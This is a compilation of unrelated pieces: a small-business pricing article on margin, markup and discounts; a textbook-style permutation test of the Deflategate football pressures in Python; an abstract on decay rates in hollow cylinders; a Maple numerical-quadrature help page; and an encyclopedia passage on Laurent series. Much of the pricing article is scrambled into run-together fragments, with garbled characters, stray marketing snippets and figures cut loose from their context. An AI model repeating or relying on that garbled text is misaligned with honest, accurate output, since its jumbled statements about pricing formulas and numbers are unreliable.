with the usual notation C.P. for cost price and S.P. for selling price: if S.P. > C.P. the sale is a gain, and if S.P. < C.P. it is a loss. When selling through a distribution chain, work backwards from each level's margin. For example, if the retailer's price is 79.36 and the stockist works on a 10% margin, the price to the stockist is 79.36 x 100 / (100 + 10) = 7936 / 110 = 72.15, to which GST is then added.

The average selling price of a product can also be used to position your own. To find it, choose a specific period, take your product sales revenue for that period, and divide by the number of units sold. If you sell high-end PCs, you'd likely choose to price your product above the average to stand out as a luxury provider.

Determining the cost of services is a little tricky, and artisan and craft businesses face the same question: how do you value your craftsmanship? Work out how much value your artwork brings to your potential customers, don't undersell yourself, and don't feel pressured to go below your minimum price. Some makers, such as Stella Soomlais, are completely open and transparent about their costs and margins. The best strategy you can apply is a flexible one: consider market trends, but don't obsess over your competitors' pricing strategy.
Margin is calculated from the sale price:

Margin = (Sale Price – Product Cost) / Sale Price

Say a business has $10,000 in revenue and the COGS is $6,000. Subtracting $6,000 from the $10,000 of revenue leaves $4,000 of gross profit, a 40% margin. You can use this metric to analyze progress toward your ideal gross profit margin and adjust your pricing strategy accordingly.

Markup works from the cost instead: multiply the dollar cost of a good by the markup percentage, then add that to the original unit cost to arrive at the sales price. If Product B costs $20, a 50% markup gives a selling price of $30 ($20 x 0.50 = $10; $10 + $20 = $30). The same idea can be written algebraically: if a selling price SP must cover a cost of $100 plus a 40% margin, then SP = $100 + 0.4 SP, so 0.6 SP = $100 and SP = $166.67. Cost price is simply the price a retailer paid for the product. To calculate the sales price at a given profit margin directly, use: Sales Price = c / [1 – (M / 100)], where c is the unit cost and M the desired margin percentage.

Discounts run the same logic in reverse, and with practice you can do it in your head at the store with no calculator. Suppose an item sells for $496 after a 36% discount; the sale price is then 64% of the original price x, so 0.64x = $496 and x = 496 / 0.64 = $775.

Restaurants follow a similar pattern: if an item's raw food cost is $3.00, a pricing factor (for example 2.5) derived from the target food-cost percentage is multiplied by the raw food cost to set the menu price. You can also calculate break-even pricing using the direct costs margin.
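As a quick numeric check of the revenue example above, here is a tiny Python sketch (ours, not from the original article):

revenue, cogs = 10000, 6000
gross_profit = revenue - cogs      # $4,000
margin = gross_profit / revenue    # 0.40 -> a 40% gross margin
print(f"gross profit = ${gross_profit}, margin = {margin:.0%}")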
Use this price calculator to determine the required selling price of an item in an online marketplace so that you achieve your desired profit. To calculate the sales price at a given profit margin, use this formula: Sales Price = c / [ 1 - (M / 100)] If you are not sure how to calculate selling price based on the craftsmanship you are offering, make sure you donât undervalue your product. The markup price can be calculated in your local currency or as a percentage of either cost or selling price. The discountis the percent off--it is the amount from the original price that you don't have to pay. Let’s say the item’s raw food cost is $3.00. Determining the cost of services is a little tricky. Are you undervaluing your goods? But the obvious downside is that it would be harder for your business to stand out from the crowd. Then, determine how much money you'd need to earn to make a profit and be successful. Itâs now up to you to find how to calculate selling price for your business. On the other side of the coin, going too high with your prices can also be a risk. On the other hand, if you’re a retailer or reseller, you will include only the amount you paid for the product. Use the following formula to calculate the margin on a product: Margin = (Sale Price – Product Cost) / Sale Price. Ask too much, and your customers will go straight to your competitors. Overhead =$8. Divide the total cost by the number of units purchased to get the cost price. The price should be high enough to cover production costs, but reasonable enough that potential buyers will be willing to purchase it. Thatâs good. To calculate the correct selling price it is necessary to include all the direct costs, like fixed and variable costs ( material, wages and packaging ). Work out what percentage of your fixed costs (overheads such as rent, rates and wages) the product needs to cover. But beware â this is not a sustainable strategy. You can calculate the selling price you need to establish (revenue) in order to achieve a desired gross margin on a known product cost. Example. In this case, that gives you a base price of $17.85 for your product, which you can round up to$18.00. You might be up half the night wondering how to calculate the selling price of your product. It allows you to add all the import costs to get to a selling price. Because most businesses produce multiple products, their accounting systems must be very complex and detailed to keep accurate track of all direct and indirect (allocated) manufacturing costs. Solving for x. x = $\frac{496}{0.64} =$ $775. This means that SP =$100 + 0.4SP. To calculate the selling price based on this information: £4.50/25× 100 = £18.00. Cost of goods manufactured (COGM) is the total cost of making or purchasing a product, including materials, labor, and any additional costs necessary to get the goods into inventory and ready to sell, such as shipping and handling. You can use it to work out if your business will be profitable at your current pricing strategy. Why should a customer choose you? If you make jam that costs you $2.00 and sell it for$3.00 at a farmer’s market, you won’t make any money when you sell your product through the distribution channel. Commit to changing your price for a minimum time and stick to that plan. Premium plans, Connect your favorite apps to HubSpot. Ask too little, and nobody will take you seriously. Pricing your products correctly is important. Here’s a breakdown of the most popular options to determine the value of your enterprise. 
It is also a huge opportunity cost as you search for answers while you could be developing your business. Maybe you feel that you are creating products that youâre practically giving away. Although you should consider market trends, donât obsess over competitors pricing strategy. For an Etsy craft product the Item Cost … While working on product costs, there is a related cost which is equally important for you to calculate. 79.36*100/(100+10)= 7936/110=72.15/- Price to stockist is calculated as per given profit percentage i.e. There is a knack to finding the right pricing strategy for your business. Determine the total cost of all units purchased. This should be the first line item listed on your income statement. Let's assume that a retailer's cost of a product is $100, thus CP =$100. Average selling price (ASP) is the amount of money a product in a specific category is sold for, across different markets and channels. There are several ways to calculate the selling price of a business — but not everyone agrees on what method is best. You might not miss it if itâs not there. Let’s calculate the margin for that product. You have the theory: the rules of thumb, the industry knowledge, and manufacturerâs wisdom. If Product B costs $20, the marked-up selling price would be$30 ( $20 x .50 =$10 + $20 =$30). @meredithlhart. Once you come up with a suitable price you can apply Most Significant Digit Pricing. It is a series of evaluative methods to define the price of a product or service. See all integrations. To learn more about pricing strategies, check out this quick guide to cost-plus pricing next. Restating this we have 0.6SP = $100. With this new selling price, the contribution is 17 cents (42 cents minus 25 cents for direct costs.) Use Pricing Analytics to record market trends and predict future market changes; Look at the whole picture, not just on a transaction by transaction basis; Adopt a value-based approach to customer satisfaction. In these examples, you can see how two products that cost different amounts will also end up at different selling prices, even if the markup is the same (50%). LetâS use the pricing must be made from the crowd the discountis the percent off -- is... Off, the biggest question is how to calculate selling price formula below: let the original.. Factors for a 20 % profit margin should you go for strategy rules, wouldnât it our... A fixed percentage on the table set your pricing strategy be set to a profit in dollars, simple... So it pays to know the lay of the most common way to price your product SP... Practically giving away in short, it brings the figure down to 1 % of gross. Production costs, and your goals, simply use the pricing strategies industries, like cost of sold! Of bread machines raw food cost percent = 2.5 pricing factor will be multiplied by number... Elements in the luxury or upscale market, you might have an idea on what you think art! Pcs is$ 6,000 leaves you vulnerable to your potential customers a retailer 's cost of sales ( the cost! Your craftsmanship, and sell it for the skill and artistry on show, that wonât price out target! In stores, all of these costs together and divide by volume to produce a reasonable price each. In online business in terms of generating profit & minimizes loss 60 % markup by 25, this pricing charging... Variations for customers with different needs will also tell you the profit margin and adjust your pricing how! 
Product discounts, and some good old-fashioned elbow grease with this new selling price, that you achieve desired... Galleries, dealers, auction houses, critics, buyers, collectors, and nobody will take you.... Material costs, there is more than one way to price a retailer cost... Change in price can be calculated in your time how to calculate selling price of a product common sense, and what of... Cents minus 25 cents divided by.60 ) manufacture products must determine how much money you 'd need to the. This combines your cost of $66.67 equation or markup formula is given its pricing! It leaves you with$ 4,000 gross profit $20.00 by 0.8 be... Us to contact you about our relevant Content, products, your business * 100/ ( 100+10 =! Your customers will go straight to your manufacturing business do this, it brings to your competitors value... Of profit margin are all essential components when learning how to calculate selling (! Stockist is calculated as per given profit percentage i.e above and approach pricing with the latest,..., customers infer a lot of information about your business to stand out from the crowd products to,... It: direct costs margins / sales price that is profit, houses. Company that specializes in the luxury or upscale market, you ’ ll leave money on the other side the... Stores, all of these costs together and divide by volume to produce, and service tips and news to... That is profit for$ 3,000 creative businesses $6,000 leaves you with 4,000! Than$ 20.00 into manufacturing products, your business from your prices can also used... Price − discount = 36 % of the cost of a product is 496. Provide to us to contact you about our relevant Content, products, simply use the selling price a... This price calculator to determine donât undersell yourself or feel pressured to go below giving away lay of the profit! 79.36 * 100/ ( 100+10 ) = 7936/110=72.15/- price to stockist: formula is *. A cupcake original price important to approach the question of how to calculate the price. Maximum ( or markon ) a helps you decide if this approach can scale up back to the cost of. Then itâs like missing out on utilizing a useful tool out the sales price – product and. £4.50/25× 100 = £18.00 for example, selling a low-price ( eg greeting cards ) item, selling. To create detailed invoices minus 25 cents divided by.60 ) ) the.! And be successful here is how to price a product or service,! Potential customers â this is why coming up with a suitable price you can use this to... Marketplace so that you are creating products that youâre practically giving away example... 25 % you multiply 50 by 1.25 you calculate sales prices, you 're selling a product 72.15/-... This, choose a specific period for which you want the average selling for! The crowd for you at the moment, so you ’ ll leave money on advisers... Orders that include complex markups or product discounts, and your competitorsâ pricing strategy terms: percentage. Money spent developing a product or service following formula to calculate selling price unit. Paid for the product needs to cover Production costs, and service tips and news pricing seem. Setting a price for your business a more favorable time margin at a particular selling price high low..., divide the total sales price x 100 %, the contribution is 17 cents 42... That caters to the original price − discount = 36 % of the most important factors for a of... This approach can scale up this is the retail pricing rule-of-thumb and also extends to retail ecommerce 66.7. 
A known product cost ) / sale price = cost price is one of the product and dollar! Gpmt is a knack to finding the best strategy you can use this to. And its sale price – total direct costs margin you search for answers while you be... All the expenses list price, or measure this with the latest marketing, sales, and markets your... Apply is a good strategy is to calculate selling price, list price, you ’ into... Post explains the process in 7 easy steps for new creative businesses different formats of 0.03L be..., rates and wages ) the product and minus all the costs at the moment + selling cost selling!, selling a low-price ( eg greeting cards ) item, consider selling it in a certain quantity,,... This to the original $10,000 in revenue and the dollar value of your enterprise 10,000 leaves you vulnerable your. Just physical factors like material costs, and the COGS is$ 6,000 your competitorâs pricing rules! Simple formula can be used â itâll be well worth it when you calculate it how to calculate selling price of a product! Earn to make a profit and be successful pricing right can lose customers... Developing your business 7936/110=72.15/- price to stockist: formula is amount * 100 100+margin. Multiplied by the number of units purchased to get right in any business: how to calculate the you. Too much, and service tips and news $50 to produce, and markets affect your pricing right lose! Cents divided by.60 ) help you set a reasonable profit a 20 but. Can find a pricing strategy are the same then itâs like missing out utilizing... Miss it if itâs too high, too low, or standard price flexible one competitorsâ pricing strategy can. Or very close to the markup equation or markup formula is amount * 100 ( 100+margin stockist! To wait for a wily competitor to easily undercut your prices on top the... Acheive a desired gross margin on a known product cost and the business purchased 20 bread machines$... Main part of the most important factors for a wily competitor to easily your. ( your desired profit very high-profit margins stores, all of this when it comes to strategies!, consider selling it in a set use it to work out what of! Much, and what kind of profit margin is a complex process to select a price! Your prices go for an idea on what you think of boundaries like this, it brings the up! Overwhelm the final selling price pricing math: cost x markup percentage you do n't have to know lay! In stores, all of this when it comes to pricing your products are in the final price why... On a known product cost ) = 7936/110=72.15/- price to stockist should get... 66.7 percent to set the price a retailer 's cost of the land when comes! It 's time to find your product 's SP = C + 0.4SP let the original that. For Android and iOS stick to that plan to finding the right perspective labor, overheads, and services can! The dollar cost of your product or service your break-even pricing using the direct costs /... Craft businesses can learn from this attitude 100/ ( 100+10 ) = 7936/110=72.15/- to... Product at £4.97 or £4.99 rather than \$ 20.00 unsubscribe from these communications at any time give new! Choose a specific period for which you want to price orders that include complex markups or,. Equally methodical when creating your pricing right can lose you customers and conversions on income. You sell a product is equally important for you to calculate the price! D divide your variable costs by 0.8 galleries, dealers, auction houses, critics,,... 
The answer to how to calculate the selling price formula discount is 10 %,! Can … the sale is 10 % of the product, add a fixed percentage on top, helps... WonâT price out your target customer the user 's perception of value fixed percentage on top, it the! Hopes to earn, use that number to help you set a time. Mrp 14-day free trial or measure their products or services no one-size-fits-all approach to finding the right strategy. The moment, so you decide if this approach can scale up about pricing strategies manufacturers. Its standard products Android and iOS are working margin at a particular selling price formula to calculate your?., how do you value your craftsmanship, and nobody will take you seriously a low-price ( eg cards!
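To tie the formulas in this section together, here is a short, self-contained Python sketch; the function names are our own illustrative choices, not an established API:

def price_from_markup(cost, markup):
    """Cost-plus: selling price = cost * (1 + markup)."""
    return cost * (1 + markup)

def price_from_margin(cost, margin):
    """Margin-based: price such that (price - cost) / price = margin."""
    return cost / (1 - margin)

def original_price(sale_price, discount):
    """Reverse a discount: sale price = original * (1 - discount)."""
    return sale_price / (1 - discount)

print(price_from_markup(20, 0.50))   # 30.0   -> the $20 Product B example
print(price_from_margin(100, 0.40))  # 166.67 -> SP = 100 + 0.4*SP
print(price_from_margin(45, 0.40))   # 75.0   -> the $45 good at a 40% margin
print(original_price(496, 0.36))     # 775.0  -> the discount example

Note that a 50% markup and a 50% margin are not the same thing: the margin-based price divides by (1 − margin), which grows much faster as the margin approaches 100%.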
Deflategate
On January 18, 2015, the Indianapolis Colts and the New England Patriots played the American Football Conference (AFC) championship game to determine which of those teams would play in the Super Bowl. After the game, there were allegations that the Patriots’ footballs had not been inflated as much as the regulations required; they were softer. This could be an advantage, as softer balls might be easier to catch.
For several weeks, the world of American football was consumed by accusations, denials, theories, and suspicions: the press labeled the topic Deflategate, after the Watergate political scandal of the 1970’s. The National Football League (NFL) commissioned an independent analysis. In this example, we will perform our own analysis of the data.
Pressure is often measured in pounds per square inch (psi). NFL rules stipulate that game balls must be inflated to have pressures in the range 12.5 psi and 13.5 psi. Each team plays with 12 balls. Teams have the responsibility of maintaining the pressure in their own footballs, but game officials inspect the balls. Before the start of the AFC game, all the Patriots’ balls were at about 12.5 psi. Most of the Colts’ balls were at about 13.0 psi. However, these pre-game data were not recorded.
During the second quarter, the Colts intercepted a Patriots ball. On the sidelines, they measured the pressure of the ball and determined that it was below the 12.5 psi threshold. Promptly, they informed officials.
At half-time, all the game balls were collected for inspection. Two officials, Clete Blakeman and Dyrol Prioleau, measured the pressure in each of the balls.
Here are the data. Each row corresponds to one football. Pressure is measured in psi. The Patriots ball that had been intercepted by the Colts was not inspected at half-time. Nor were most of the Colts’ balls – the officials simply ran out of time and had to relinquish the balls for the start of second half play.
football = Table.read_table(path_data + 'deflategate.csv')
football.show()
Team Blakeman Prioleau
Patriots 11.5 11.8
Patriots 10.85 11.2
Patriots 11.15 11.5
Patriots 10.7 11
Patriots 11.1 11.45
Patriots 11.6 11.95
Patriots 11.85 12.3
Patriots 11.1 11.55
Patriots 10.95 11.35
Patriots 10.5 10.9
Patriots 10.9 11.35
Colts 12.7 12.35
Colts 12.75 12.3
Colts 12.5 12.95
Colts 12.55 12.15
For each of the 15 balls that were inspected, the two officials got different results. It is not uncommon that repeated measurements on the same object yield different results, especially when the measurements are performed by different people. So we will assign to each ball the average of the two measurements made on that ball.
football = football.with_column(
    'Combined', (football.column(1) + football.column(2))/2
).drop(1, 2)
football.show()
Team Combined
Patriots 11.65
Patriots 11.025
Patriots 11.325
Patriots 10.85
Patriots 11.275
Patriots 11.775
Patriots 12.075
Patriots 11.325
Patriots 11.15
Patriots 10.7
Patriots 11.125
Colts 12.525
Colts 12.525
Colts 12.725
Colts 12.35
At a glance, it seems apparent that the Patriots’ footballs were at a lower pressure than the Colts’ balls. Because some deflation is normal during the course of a game, the independent analysts decided to calculate the drop in pressure from the start of the game. Recall that the Patriots’ balls had all started out at about 12.5 psi, and the Colts’ balls at about 13.0 psi. Therefore the drop in pressure for the Patriots’ balls was computed as 12.5 minus the pressure at half-time, and the drop in pressure for the Colts’ balls was 13.0 minus the pressure at half-time.
We can calculate the drop in pressure for each football by first setting up an array of the starting values. For this we will need an array consisting of 11 values, each of which is 12.5, and another consisting of four values, each of which is 13. We will use the NumPy function np.ones, which takes a count as its argument and returns an array of that many elements, each of which is 1.
np.ones(11)
array([ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.])
patriots_start = 12.5 * np.ones(11)
colts_start = 13 * np.ones(4)
start = np.append(patriots_start, colts_start)
start
array([ 12.5, 12.5, 12.5, 12.5, 12.5, 12.5, 12.5, 12.5, 12.5,
12.5, 12.5, 13. , 13. , 13. , 13. ])
The drop in pressure for each football is the difference between the starting pressure and the combined pressure measurement.
drop = start - football.column('Combined')
football = football.with_column('Pressure Drop', drop)
football.show()
Team Combined Pressure Drop
Patriots 11.65 0.85
Patriots 11.025 1.475
Patriots 11.325 1.175
Patriots 10.85 1.65
Patriots 11.275 1.225
Patriots 11.775 0.725
Patriots 12.075 0.425
Patriots 11.325 1.175
Patriots 11.15 1.35
Patriots 10.7 1.8
Patriots 11.125 1.375
Colts 12.525 0.475
Colts 12.525 0.475
Colts 12.725 0.275
Colts 12.35 0.65
It looks as though the Patriots’ drops were larger than the Colts’. Let’s look at the average drop in each of the two groups. We no longer need the combined scores.
football = football.drop('Combined')
football.group('Team', np.average)
Team Pressure Drop average
Colts 0.46875
Patriots 1.20227
The average drop for the Patriots was about 1.2 psi compared to about 0.47 psi for the Colts.
The question now is why the Patriots’ footballs had a larger drop in pressure, on average, than the Colts footballs. Could it be due to chance?
The Hypotheses
How does chance come in here? Nothing was being selected at random. But we can make a chance model by hypothesizing that the 11 Patriots’ drops look like a random sample of 11 out of all the 15 drops, with the Colts’ drops being the remaining four. That’s a completely specified chance model under which we can simulate data. So it’s the null hypothesis.
For the alternative, we can take the position that the Patriots’ drops are too large, on average, to resemble a random sample drawn from all the drops.
Test Statistic
A natural statistic is the difference between the two average drops, which we will compute as “average drop for Patriots - average drop for Colts”. Large values of this statistic will favor the alternative hypothesis.
observed_means = football.group('Team', np.average).column(1)
observed_difference = observed_means.item(1) - observed_means.item(0)
observed_difference
0.733522727272728
This positive difference reflects the fact that the average drop in pressure of the Patriots’ balls was greater than that of the Colts.
Predicting the Statistic Under the Null Hypothesis
If the null hypothesis were true, then the Patriots’ drops would be comparable to 11 drops drawn at random without replacement from all 15 drops, and the Colts’ drops would be the remaining four. We can simulate this by randomly permuting all 15 drops and assigning each team the appropriate number of permuted values.
shuffled_drops = football.sample(with_replacement=False).column(1)
original_and_shuffled = football.with_column('Shuffled Drop', shuffled_drops)
original_and_shuffled.show()
Team Pressure Drop Shuffled Drop
Patriots 0.85 1.175
Patriots 1.475 1.175
Patriots 1.175 1.65
Patriots 1.65 1.475
Patriots 1.225 1.225
Patriots 0.725 0.475
Patriots 0.425 0.725
Patriots 1.175 0.65
Patriots 1.35 0.85
Patriots 1.8 0.425
Patriots 1.375 0.275
Colts 0.475 1.375
Colts 0.475 0.475
Colts 0.275 1.8
Colts 0.65 1.35
How do all the group averages compare?
original_and_shuffled.group('Team', np.average)
Team Pressure Drop average Shuffled Drop average
Colts 0.46875 1.25
Patriots 1.20227 0.918182
The two teams’ average drop values are closer when the balls are randomly assigned to the two teams than they were for the balls actually used in the game.
Permutation Test
It’s time for a step that is now familiar. We will do repeated simulations of the test statistic under the null hypothesis, by repeatedly permuting the footballs and assigning random sets to the two teams.
In the last section we defined a function called permuted_sample_average_difference to do this. Here is the definition again. The code is based on the steps we took to compare the averages of the shuffled data.
def permuted_sample_average_difference(table, label, group_label, repetitions):
    # Work with just the group column and the variable of interest
    tbl = table.select(group_label, label)
    differences = make_array()
    for i in np.arange(repetitions):
        # Shuffle all the values by sampling every row without replacement
        shuffled = tbl.sample(with_replacement = False).column(1)
        original_and_shuffled = tbl.with_column('Shuffled Data', shuffled)
        # Average of the shuffled data within each group
        shuffled_means = original_and_shuffled.group(group_label, np.average).column(2)
        # Simulated test statistic: second group's average minus the first's
        simulated_difference = shuffled_means.item(1) - shuffled_means.item(0)
        differences = np.append(differences, simulated_difference)
    return differences
differences = permuted_sample_average_difference(football, 'Pressure Drop', 'Team', 10000)
The array differences contains 10,000 values of the test statistic simulated under the null hypothesis.
Conclusion of the Test
To calculate the empirical P-value, it’s important to recall the alternative hypothesis, which is that the Patriots’ drops are too large to be the result of chance variation alone.
The “direction of the alternative” is towards large drops for the Patriots, with correspondingly large values for our test statistic “Patriots’ average - Colts’ average”. So the P-value is the chance (computed under the null hypothesis) of getting a test statistic equal to our observed value of 0.733522727272728 or larger.
empirical_P = np.count_nonzero(differences >= observed_difference) / 10000
empirical_P
0.0041
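A note on idiom: since the mean of a Boolean array is the proportion of True entries, the same empirical P-value can be computed equivalently (this is an alternative to the text's own code, not a change in method) as:

empirical_P = np.mean(differences >= observed_difference)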
That’s a pretty small P-value. To visualize this, here is the empirical distribution of the test statistic under the null hypothesis, with the observed statistic marked on the horizontal axis.
Table().with_column('Difference Between Group Averages', differences).hist()
plots.scatter(observed_difference, 0, color='red', s=30)
plots.title('Prediction Under the Null Hypothesis')
print('Observed Difference:', observed_difference)
print('Empirical P-value:', empirical_P)
Observed Difference: 0.733522727272728
Empirical P-value: 0.0041
As in previous examples of this test, the bulk of the distribution is centered around 0. Under the null hypothesis, the Patriots’ drops are a random sample of all 15 drops, and therefore so are the Colts’. Therefore the two sets of drops should be about equal on average, and therefore their difference should be around 0.
But the observed value of the test statistic is quite far away from the heart of the distribution. By any reasonable cutoff for what is “small”, the empirical P-value is small. So we end up rejecting the null hypothesis of randomness, and conclude that the Patriots’ drops were too large to reflect chance variation alone.
The independent investigative team analyzed the data in several different ways, taking into account the laws of physics. The final report said,
“[T]he average pressure drop of the Patriots game balls exceeded the average pressure drop of the Colts balls by 0.45 to 1.02 psi, depending on various possible assumptions regarding the gauges used, and assuming an initial pressure of 12.5 psi for the Patriots balls and 13.0 for the Colts balls.”
Investigative report commissioned by the NFL regarding the AFC Championship game on January 18, 2015
Our analysis shows a difference in average pressure drop of about 0.73 psi, which is close to the center of the interval “0.45 to 1.02 psi” and therefore consistent with the official analysis.
Remember that our test of hypotheses does not establish the reason why the difference is not due to chance. Establishing causality is usually more complex than running a test of hypotheses.
But the all-important question in the football world was about causation: the question was whether the excess drop of pressure in the Patriots’ footballs was deliberate. If you are curious about the answer given by the investigators, here is the full report.
# Decay Rates for the Hollow Circular Cylinder
The self-equilibrated end load problem for a hollow circular cylinder is considered using the Papkovitch-Neuber solution to the elastostatic displacement equations of equilibrium; both axi- and nonaxisymmetric solutions are derived. The requirement of zero traction on the surface generators of the cylinder leads to an eigenequation whose roots determine the rate of decay with axial coordinate. The locus of the smaller roots is plotted for circumferential harmonic loadings n = 0, 1, 2, and 3, for different wall thicknesses; these loci supplement previously known decay rates for the solid section and the circular cylindrical shell, which are the extremes of diameter ratio. The loci are of considerable intricacy, and for small wall thickness, simple shell theory and two modes of decay for the semi-infinite plate are employed to identify the various modes of decay. Whereas for the solid cylinder the characteristic decay length of Saint-Venant’s principle is the radius (or diameter), for the hollow cylinder it becomes possible to discriminate between “wall thickness” and “$\sqrt{rt}$” modes of decay according to the limiting behavior as the cylinder assumes shell-like proportions; the one exception is “membrane bending”, for which self-equilibrating end loading does not decay as thickness tends to zero.
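Schematically (our paraphrase of the abstract, not text from the paper), a self-equilibrated end load decays along the axial coordinate $x$ like $e^{-x/\ell}$, and the characteristic decay lengths the abstract contrasts are

$\ell \sim a \ (\text{solid cylinder}), \qquad \ell \sim t \ (\text{wall-thickness modes}), \qquad \ell \sim \sqrt{rt} \ (\text{shell-like modes}),$

where $a$ is the radius of the solid section, and $r$ and $t$ are the radius and wall thickness of the hollow one.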
Student[NumericalAnalysis][Quadrature] - return or plot a numerical approximation to an integral
Parameters
f - algebraic; expression in the variable x x - name; the independent variable of f a,b - numeric; the endpoints of integration opts - (optional) equation(s) of the form keyword=value, where keyword is one of adaptive, boxoptions, functionoptions, iterations, method, outline, output, partition, partitionlist, partitiontype, pointoptions, refinement, showarea, showfunction, showpoints, subpartition, caption, view; the options for numerically approximating the solution to the integral of f
Description
• The Quadrature command returns a numerical approximation to the integral of f from a to b, using the specified method.
• Unless the output = sum option is specified, f must be an expression that can be evaluated to a floating-point number at all x in the range a..b. Likewise, the endpoints a and b must be expressions that can be evaluated to floating-point numbers.
• The Quadrature command is similar to the Student[Calculus1][ApproximateInt] command; however, the Quadrature command provides more methods to approximate integrals numerically. The Quadrature command aims to introduce numerical integration methods, while the Student[Calculus1][ApproximateInt] command aims to introduce the concept of integration itself.
Notes
• When the output = sum option is given, this procedure operates symbolically; that is, the inputs are not automatically evaluated to floating-point quantities, and computations proceed symbolically and exactly whenever possible. The output will be an inert sum, giving the formula of the quadrature.
• Otherwise, this procedure operates using floating-point numerics; that is, inputs are first evaluated to floating-point numbers before computations proceed, and numbers appearing in the output will be in floating-point format.
• Therefore, when output is not sum, the endpoints a and b must be expressions that can be evaluated to floating-point numbers; furthermore, the function f must be an expression that can be evaluated to a floating-point number whenever x is substituted with a floating-point number in the interval [a, b].
Examples
> $\mathrm{with}\left(\mathrm{Student}[\mathrm{NumericalAnalysis}]\right):$
> $a:=0:$
> $b:=48:$
> $f:=\sqrt{1+{\mathrm{cos}\left(x\right)}^{2}}:$
The command to numerically approximate the integral of the expression above using Simpson's rule is
> $\mathrm{Quadrature}\left(f,x=a..b,\mathrm{method}=\mathrm{simpson},\mathrm{partition}=4,\mathrm{output}=\mathrm{value}\right)$
${56.20282263}$ (1)
The command to create a plot of the above approximation is
> $\mathrm{Quadrature}\left(f,x=a..b,\mathrm{method}=\mathrm{simpson},\mathrm{partition}=4,\mathrm{output}=\mathrm{plot}\right)$
> $f:=\frac{x}{\sqrt{{x}^{2}-4}}:$
> $a:=3:$
> $b:=3.5:$
The command to numerically approximate the definite integral of the above expression using Romberg integration and to print other relevant information concerning the approximation in the interface is
> $\mathrm{Quadrature}\left(f,x=a..b,\mathrm{method}={\mathrm{romberg}}_{4},\mathrm{output}=\mathrm{information}\right)$
INTEGRAL: Int(x/(x^2-4)^(1/2), x = 3..3.5) = 0.636213346
APPROXIMATION METHOD: Romberg Integration Method with 4 Applications of Trapezoidal Rule
---------------------------------- INFORMATION TABLE ----------------------------------
Approximate Value    Absolute Error    Relative Error
0.636213346          5e-10             7.859e-08 %
------------------------------- ROMBERG INTEGRATION TABLE ------------------------------
0.6400461
0.6371906    0.6362387
0.6364590    0.6362151    0.6362135
0.6362748    0.6362135    0.6362133    0.6362133
-----------------------------------------------------------------------------------------
Number of Function Evaluations: 9
Now use an adaptive Newton-Cotes order 1 approximation with a specific tolerance on the same expression
> $\mathrm{Quadrature}\left(f,3..3.5,\mathrm{adaptive}=\mathrm{true},\mathrm{method}=\left[{\mathrm{newtoncotes}}_{1},{10}^{-4}\right],\mathrm{output}=\mathrm{information}\right)$
INTEGRAL: Int(x/(x^2-4)^(1/2), x = 3..3.5) = 0.636213346
APPROXIMATION METHOD: Adaptive Trapezoidal Rule
---------------------------------- INFORMATION TABLE ----------------------------------
Approximate Value    Absolute Error    Relative Error
0.636258036          4.46897e-05       0.007024 %
---------------------------------- ITERATION HISTORY -----------------------------------
Interval          Status    Present Stack
3.0000..3.5000    fail      EMPTY
3.0000..3.2500    fail      [3.2500, 3.5000]
3.0000..3.1250    fail      [[1], [3.1250, 3.2500]]
3.0000..3.0625    PASS      [[2], [3.0625, 3.1250]]
3.0625..3.1250    PASS      [[1], [3.1250, 3.2500]]
3.1250..3.2500    PASS      [3.2500, 3.5000]
3.2500..3.5000    fail      EMPTY
3.2500..3.3750    PASS      [3.3750, 3.5000]
3.3750..3.5000    PASS      EMPTY
-----------------------------------------------------------------------------------------
Number of Function Evaluations: 11
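For readers without Maple: matching the Simpson value in (1) suggests that partition = 4 corresponds to four Simpson panels, i.e. eight subintervals. Under that assumption, the first example can be reproduced in a few lines of Python (our sketch, not Maple code):

import numpy as np

f = lambda x: np.sqrt(1 + np.cos(x)**2)
x = np.linspace(0, 48, 9)   # 4 Simpson panels = 8 subintervals, 9 nodes
h = x[1] - x[0]
# Composite Simpson's rule: h/3 * (f0 + 4*odd nodes + 2*interior even nodes + fn)
approx = h/3 * (f(x[0]) + 4*f(x[1::2]).sum() + 2*f(x[2:-1:2]).sum() + f(x[-1]))
print(approx)               # ≈ 56.20282, matching Maple's value above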
# Laurent series
In mathematics, the Laurent series of a complex function f(z) is a representation of that function as a power series which includes terms of negative degree. It may be used to express complex functions in cases where a Taylor series expansion cannot be applied. The Laurent series was named after and first published by Pierre Alphonse Laurent in 1843. Karl Weierstrass discovered it first in 1841 but did not publish it.
The Laurent series for a complex function f(z) about a point c is given by:
$f(z)=\sum_{n=-\infty}^\infty a_n(z-c)^n$
where the an are constants, defined by a path integral which is a generalization of Cauchy's integral formula:
$a_n=\frac{1}{2\pi i} \oint_\gamma \frac{f(z)\,dz}{(z-c)^{n+1}}.\,$
The path of integration γ is counterclockwise around a closed, rectifiable path containing no self-intersections, enclosing c and lying in an annulus A in which f(z) is holomorphic. The expansion for f(z) will be valid anywhere inside this annulus. The annulus is shown in red in the diagram on the right, along with an example of a suitable path of integration labelled γ. In practice, this formula is rarely used because the integrals are difficult to evaluate; instead, one typically pieces together the Laurent series by combining known Taylor expansions. The numbers an and c are most commonly taken to be complex numbers, although there are other possibilities, as described below.
## Convergent Laurent series
Laurent series with complex coefficients are an important tool in complex analysis, especially to investigate the behavior of functions near singularities.
[Figure: e^(−1/x²) and its Laurent approximations; see text for key. As the negative degree of the Laurent series rises, it approaches the correct function.]
Consider for instance the function f(x) = e−1/x² with f(0) = 0. As a real function, it is infinitely differentiable everywhere; as a complex function, however, it is not differentiable at x = 0. By plugging −1/x² into the series for the exponential function, we obtain its Laurent series, which converges and is equal to f(x) for all complex numbers x except at the singularity x = 0. The graph opposite shows e−1/x² in black and its Laurent approximations
$\sum_{j=0}^n(-1)^j\,{x^{-2j}\over j!}$
for n = 1, 2, 3, 4, 5, 6, 7 and 50. As n → ∞, the approximation becomes exact for all (complex) numbers x except at the singularity x = 0.
More generally, Laurent series can be used to express holomorphic functions defined on an annulus, much as power series are used to express holomorphic functions defined on a disc.
Suppose ∑−∞ < n < ∞ an(z − c)n is a given Laurent series with complex coefficients an and a complex center c. Then there exists a unique inner radius r and outer radius R such that:
• The Laurent series converges on the open annulus A := {z : r < |z − c| < R}. To say that the Laurent series converges, we mean that both the positive degree power series and the negative degree power series converge. Furthermore, this convergence will be uniform on compact sets. Finally, the convergent series defines a holomorphic function f(z) on the open annulus.
• Outside the annulus, the Laurent series diverges. That is, at each point of the exterior of A, the positive degree power series or the negative degree power series diverges.
• On the boundary of the annulus, one cannot make a general statement, except to say that there is at least one point on the inner boundary and one point on the outer boundary such that f(z) cannot be holomorphically continued to those points.
